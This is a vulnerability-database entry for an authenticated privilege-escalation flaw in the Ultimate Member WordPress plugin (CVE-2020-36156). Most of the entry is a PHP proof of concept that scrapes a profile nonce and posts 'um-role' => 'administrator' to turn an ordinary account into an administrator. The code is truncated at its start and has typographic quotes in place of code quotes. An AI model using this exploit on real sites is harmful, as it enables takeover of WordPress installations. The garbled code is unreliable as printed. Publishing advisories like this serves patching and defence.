Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbChloe ChamberlandWPVDB-ID:DD4C4ECE-7206-4788-8747-F0C0F3AB0A53
HistoryNov 09, 2020 - 12:00 a.m.

Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update

2020-11-0900:00:00
Chloe Chamberland
wpscan.com
7
ultimate member
privilege escalation
profile update
vulnerability
authentication
plugin

EPSS

0.009

Percentile

82.9%

JSON

Due to the fact that Ultimate Member allowed the creation of new roles, this plugin also made it possible for site administrators to grant secondary Ultimate Member roles for all users upon a /wp-admin profile update.

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // Pull the Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/profile.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match(‘/_wpnonce"\svalue=“([^”]+)"/’, $content, $matches); $nonce = $matches[1]; // Pull the user_id $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/profile.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match(‘/“checkuser_id”\svalue=“([^”]+)"/’, $content, $matches); $user_id = $matches[1]; // Update Settings $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/profile.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘_wpnonce’ => $nonce, ‘_wp_http_referer’ => ‘%2Fwp-admin%2Fprofile.php’, ‘from’ => ‘profile’, ‘check_userid’ => $user_id, ‘admin_bar_front’ => ‘1’, ‘first_name’ => $name, ‘last_name’ => $lastname, ‘nickname’ => $nickname, ‘email’ => $email, ‘url’ => ‘’, ‘description’ => ‘’, ‘pass1’ => ‘’, ‘pass2’ => ‘’, ‘um-role’ => ‘administrator’, ‘action’ => ‘update’, ‘user_id’ => $user_id, ‘submit’ => ‘Update+Profile’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>

Related

nvd 1
cve 1
wpexploit 1
prion 1
cvelist 1
osv 1
openvas 1
nvd
nvd
CVE-2020-36156
2021-01-04 18:15:13
cve
cve
CVE-2020-36156
2021-01-04 18:15:13
wpexploit
wpexploit
Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update
2020-11-09 00:00:00
prion
prion
Privilege escalation
2021-01-04 18:15:00
cvelist
cvelist
CVE-2020-36156
2021-01-04 17:22:25
osv
osv
CVE-2020-36156
2021-01-04 18:15:13
openvas
openvas
WordPress Ultimate Member Plugin <= 2.1.11 Multiple Privilege Escalation Vulnerabilities
2020-11-10 00:00:00

EPSS

0.009

Percentile

82.9%

JSON
Related for WPVDB-ID:DD4C4ECE-7206-4788-8747-F0C0F3AB0A53
nvd1cve1wpexploit1prion1cvelist1osv1openvas1